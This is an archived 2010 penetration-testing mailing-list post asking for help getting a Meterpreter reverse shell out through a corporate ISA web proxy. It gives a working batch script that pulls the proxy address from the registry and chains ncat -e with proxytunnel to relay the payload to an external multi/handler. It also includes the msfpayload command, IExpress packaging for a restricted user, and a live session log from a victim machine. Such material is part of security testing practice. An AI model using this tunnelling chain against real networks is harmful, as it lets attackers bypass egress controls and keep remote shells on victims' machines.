Penetration Testing mailing list archives

Tunnelling Meterpreter connections through HTTP/S Proxy servers


From: "Sherif Eldeeb" <archeldeeb () gmail com>
Date: Sat, 3 Jul 2010 08:54:57 +0300



I hit a dead end and help is appreciated. "Already asked the Metasploit list
but still stuck."
I've been trying the past few days to get a meterpreter reverse_tcp exe to
connect back through an HTTP proxy, and I had no idea that it was going to be
that difficult "for me". My approach was to include another tunneling program
that listens on a local port for meterpreter's connection and handles the
proxy bypassing, a batch file that automates the process, then pack
the whole thing with IExpress.

Meterpreter connects locally ==> proxy bypassing program ==> PROXY SERVER
====|Internet|===>  exploit/multi/handler

And I've been "partially" successful so far and feel like I'm almost there.

Here's the scenario:
- MS ISA 2006 firewall & web proxy.
- Outbound ports allowed: only 80 & 443 through the web proxy; 110, 25 and 21
with some kind of protocol filtering.
- Inbound open ports: none. Externally exposed services & servers: none.
- The solution must be valid if a restricted user executes the program.

Long story short, here's what I found so far:
- For those who didn't try before: just using LPORT 80 or 443 doesn't work
because of the web proxy; it even made meterpreter.exe grow in memory
usage to more than 1.5 GB, with HDD swapping like crazy and CPU at 100%.
- Using port 110 or 25 initially connects, but gets dropped immediately by
the firewall's protocol filter when it detects that the data being sent is
not actually what it should be.
- reverse_https & reverse_http payloads are not working, as discussed earlier.


TUNNELING EXPERIMENTS:
I will not list what didn't work for me; only "proxytunnel" looked like
the one with promising results, but it had two serious drawbacks:

1. You have to define the company's proxy server IP address and port number,
which I do not know, so I used the "REG" command to extract the data from
the registry.
2. It works with STDIN & STDOUT (not listening on ports, AFAIK): I used "ncat
-c" to listen on the local port and redirect the connection to
proxytunnel.exe.

Here's the bat file that did both (the "for" and "ncat" commands are each a
single line in the file; note "set PRXY=%%a" must have no spaces around the
"=", otherwise the variable name gets a trailing space and %PRXY% expands to
nothing):
==========CODE==========
@echo off
rem Read the user's configured proxy (host:port) from the registry: token 3 of the "ProxyServer REG_SZ host:port" line
for /f "tokens=3 delims=^ " %%a IN ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer ^| find "Proxy"') DO set PRXY=%%a
rem Listen on 127.0.0.1:4455 and hand each incoming connection to proxytunnel, which opens the CONNECT tunnel through the proxy
ncat -k -l 127.0.0.1 4455 -e "proxytunnel.exe -q -N -p %PRXY% -d MyMultiHandlerServer:443"
==========CODE==========

Proxytunnel options: "-q" quiet; "-N" use NTLM auth; "-p" proxy server; "-d"
multi/handler server:port.

And then generate msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1
LPORT=4455, put the programs together in one folder, then execute
the payload.exe.
Guess what? It works! Sort of :(

=========
msf exploit(handler) >
[*] Sending stage (748032 bytes) to 66.55.229.36
[*] Meterpreter session 1 opened (MyMultiHandlerServer:443 ->
66.55.229.36:64206) at
2010-06-20 07:40:47 +0000
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIM-PC
OS      : Windows Vista (Build 6002, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > sysinfo
Computer: VICTIM-PC
OS      : Windows Vista (Build 6002, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
=========

As you can see, it connects, interacts, then the connection dies after a short
while for some reason; payload.exe, ncat.exe and proxyserver.exe are all
still running, and the ISA monitor still indicates that the connection
is established.
Same when executing any command like "run winenum": it starts the commands
and records the results, but after 15 to 20 commands it just dies and times
out.

Away from meterpreter, if I run "ncat -l 443" on the attacking box and
"C:\proxytunnel.exe -q -N -p proxyserver:8080 -d attacking:443" on the victim's
machine, *the connection gets past the proxy*, is bidirectional and NEVER gets
dropped, though it's a useless chat program.

Any help is appreciated, really.

Thanks in advance,
Sherif.


WHAT DIDN'T WORK:
GNU httptunnel: hts didn't port-forward nicely to multi/handler.
Stunnel: has a nice-looking icon in the notification area :) didn't try
connectivity.
Ncat --ssl: for some reason it doesn't accept -e & --ssl together, which
might help.